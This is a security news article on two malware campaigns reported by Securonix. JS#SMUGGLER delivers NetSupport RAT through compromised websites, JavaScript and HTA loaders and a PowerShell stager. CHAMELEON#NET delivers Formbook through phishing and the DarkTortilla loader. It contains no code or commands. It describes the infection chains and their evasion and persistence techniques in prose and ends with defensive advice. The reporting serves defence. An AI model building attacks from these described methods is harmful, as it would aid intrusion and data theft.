A newly identified cyber campaign called JS#SMUGGLER is gaining attention after researchers observed attackers using compromised websites to distribute NetSupport RAT, a remote access tool capable of giving full control over victim devices.
Security analysts from Securonix reported that the operation relies on several coordinated components including an obfuscated JavaScript loader, an HTML Application (HTA) file executed through mshta.exe, and a PowerShell based payload responsible for retrieving and deploying the malware.
How the Infection Chain Operates
The compromised websites contain hidden redirects that silently load a scrambled JavaScript file known as phone.js. This loader checks whether the visitor is using a mobile device or desktop. Based on the device, it either displays a full screen iframe redirect or triggers the next stage by loading another remote script.
This JavaScript component includes a tracking feature to ensure the malicious code activates only during a victim’s first visit, reducing the possibility of security detection.
The next stage constructs a URL during runtime, used to download an HTA file. Once executed through mshta.exe, the HTA loader writes an encrypted PowerShell stager to disk, decrypts it, and runs it directly in memory to avoid detection tools. The stager then fetches the NetSupport RAT payload, giving the attacker remote desktop access, command execution capability, file operations, proxy functions, and full system control.
The HTA file minimizes itself and hides all window elements to operate silently. After launching the payload, the stager is removed from disk to reduce forensic traces.
Why This Campaign Is Hard to Detect
Researchers noted that the layered structure, obfuscation, device aware behavior, and fileless execution techniques indicate a well maintained and professional level malware framework. Because it relies on compromised websites, the target group appears broad rather than focused on a specific country or sector.
Security teams are advised to implement strong Content Security Policy (CSP), enable script monitoring, restrict mshta.exe usage, and enforce PowerShell logging to detect suspicious activity linked with this malware family.
CHAMELEON#NET Campaign Delivers Formbook Malware
In a related report, Securonix also detailed a separate multi stage malware operation known as CHAMELEON#NET, which uses phishing emails to distribute Formbook, a well known keylogger and information stealing malware.
Phishing Emails and Initial Infection
The campaign focuses on tricking victims in the National Social Security Sector by sending emails that encourage users to download a BZ2 archive. This triggers a complex infection chain starting with a heavily obfuscated JavaScript dropper.
This dropper extracts two JavaScript files into the system’s TEMP directory:
• svchost.js, dropping a .NET loader named DarkTortilla (QNaZg.exe), a crypter commonly used for distributing secondary payloads
• adobe.js, dropping PHat.jar, an MSI package with similar functionality
The main loader is designed to decrypt and execute Formbook entirely in memory, enabling a fileless execution method that avoids antivirus detection. The malware is added to the Windows startup folder or the system registry to maintain persistence.
Advanced Evasion and Social Engineering
The attackers combine email based social engineering with layers of script obfuscation and .NET evasion mechanics. By using conditional XOR based decryption, reflective loading, and staged execution, the threat actors significantly complicate forensic analysis and detection by traditional security tools.
Security researchers noted that the overall structure of both JS#SMUGGLER and CHAMELEON#NET reflects a rising trend of multi layered, stealthy malware operations targeting enterprise users through manipulated websites and deceptive emails.
Found this article interesting? Follow us on Twitter , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
